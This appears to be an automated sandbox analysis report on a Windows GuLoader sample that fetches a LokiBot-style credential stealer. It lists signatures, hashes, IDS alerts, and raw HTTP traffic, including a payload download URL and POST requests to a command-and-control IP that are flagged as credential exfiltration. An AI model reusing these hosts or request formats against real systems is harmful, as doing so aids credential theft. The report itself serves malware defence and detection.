Windows Analysis Report lzJWJgZhPc

Overview

General Information

Sample Name: lzJWJgZhPc (renamed file extension from none to exe)
Analysis ID: 532379
MD5: 46984f492d6314442d1a502d7ab460c4
SHA1: 3515b9159efe0abc0df68d352c4e1bed4391c2fe
SHA256: 4366a0e113d168f2809a4a1983c2198ec874b89af0bdfe465e753d409c85c51c
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"}
Multi AV Scanner detection for submitted file
Source: lzJWJgZhPc.exe ReversingLabs: Detection: 39%
Antivirus detection for URL or domain
Source: http://63.250.34.171/tickets.php?id=277 Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: lzJWJgZhPc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2
Source: lzJWJgZhPc.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_00406873 FindFirstFileW,FindClose, 1_2_00406873
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C49
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 63.250.34.171:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 63.250.34.171 63.250.34.171
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 163Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:39 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:43 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:46 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp String found in binary or memory: http://63.250.34.171/tickets.php?id=277
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lzJWJgZhPc.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Form_Sporogeni.exe, 0000000C.00000003.497554994.000000000097A000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524994253.000000001E756000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498697620.0000000000979000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498525929.0000000000977000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idf
Source: unknown HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_004056DE

System Summary:

barindex
Uses 32bit PE files
Source: lzJWJgZhPc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040352D
Detected potential crypto function
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_0040755C 1_2_0040755C
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_00406D85 1_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A78B1 6_2_080A78B1
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080AF4FC 6_2_080AF4FC
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A1B06 6_2_080A1B06
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A9950 6_2_080A9950
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A0D7B 6_2_080A0D7B
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A3A1A 6_2_080A3A1A
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A1A1E 6_2_080A1A1E
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A743B 6_2_080A743B
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A9E50 6_2_080A9E50
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A1E7F 6_2_080A1E7F
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080AB8C3 6_2_080AB8C3
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A32FB 6_2_080A32FB
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A3318 6_2_080A3318
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A0524 6_2_080A0524
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A1B30 6_2_080A1B30
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A0166 6_2_080A0166
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A0564 6_2_080A0564
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A0393 6_2_080A0393
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A05AA 6_2_080A05AA
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A1BC9 6_2_080A1BC9
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A17CF 6_2_080A17CF
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080AB5C0 6_2_080AB5C0
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A55E9 6_2_080A55E9
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A19EC 6_2_080A19EC
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A78B1 NtWriteVirtualMemory,LoadLibraryA, 6_2_080A78B1
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A9950 NtAllocateVirtualMemory, 6_2_080A9950
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_00570204 LdrInitializeThunk,NtProtectVirtualMemory, 12_2_00570204
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_005703C8 Sleep,NtProtectVirtualMemory, 12_2_005703C8
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_00570212 LdrInitializeThunk,NtProtectVirtualMemory, 12_2_00570212
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_005702DD NtProtectVirtualMemory, 12_2_005702DD
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_005702C4 NtProtectVirtualMemory, 12_2_005702C4
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_005701CD LdrInitializeThunk,NtProtectVirtualMemory, 12_2_005701CD
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_005701CB LdrInitializeThunk,NtProtectVirtualMemory, 12_2_005701CB
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_00570479 NtProtectVirtualMemory, 12_2_00570479
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_00570423 NtProtectVirtualMemory, 12_2_00570423
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 12_2_005703ED NtProtectVirtualMemory, 12_2_005703ED
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: lzJWJgZhPc.exe, 00000001.00000002.299514998.0000000000428000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameForm_Sporogeni.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING vs lzJWJgZhPc.exe
Source: lzJWJgZhPc.exe, 00000001.00000002.299502964.000000000040F000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameForm_Sporogeni.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGP